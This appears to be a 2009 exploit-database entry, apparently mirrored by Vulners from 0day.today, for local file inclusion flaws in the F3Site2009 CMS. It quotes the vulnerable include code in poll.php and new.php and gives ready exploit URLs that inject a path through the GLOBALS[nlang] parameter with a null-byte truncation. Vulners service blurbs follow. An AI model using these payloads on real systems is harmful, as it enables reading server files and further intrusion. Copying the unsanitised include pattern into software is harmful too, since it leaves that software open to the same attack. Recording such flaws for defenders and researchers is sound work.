Lucene search
K

F3Site2009 Multiple LFI Exploit

🗓️ 18 Dec 2009 00:00:00Reported by cr4wl3rType 
zdt
 zdt
🔗 0day.today👁 13 Views

F3Site2009 Multiple LFI Exploit. LFI vulnerability in poll.php and new.ph

Code
===============================
F3Site2009 Multiple LFI Exploit
===============================

##################################################################
## Exploit Title: F3Site2009 Multiple LFI Exploit               ##
## Date: 18-12-2009                                             ##
## Author: cr4wl3r                                              ##
## Software Link: http://code.google.com/p/f3site/              ##
## Version: N/A                                                 ##
## Tested on: GNU/LINUX                                         ##
##################################################################
 
~ Code [poll.php] :
 
if(file_exists('./cache/poll_'.$GLOBALS['nlang'].'.php')):
   include('./cache/poll_'.$GLOBALS['nlang'].'.php');
 
~ 3xplo!t :
 
 [F3Site2009_path]/mod/poll.php?GLOBALS[nlang]=[LFI%00]
 
 
~ Code [new.php] :
 
if(file_exists('./cache/new-'.$GLOBALS['nlang'].'.php'))
{
    include './cache/new-'.$GLOBALS['nlang'].'.php';
}
 
~ 3xplo!t :
 
 [F3Site2009_path]/mod/new.php?GLOBALS[nlang]=[LFI%00]



#  0day.today [2018-02-06]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

18 Dec 2009 00:00Current
7.1High risk
Vulners AI Score7.1
13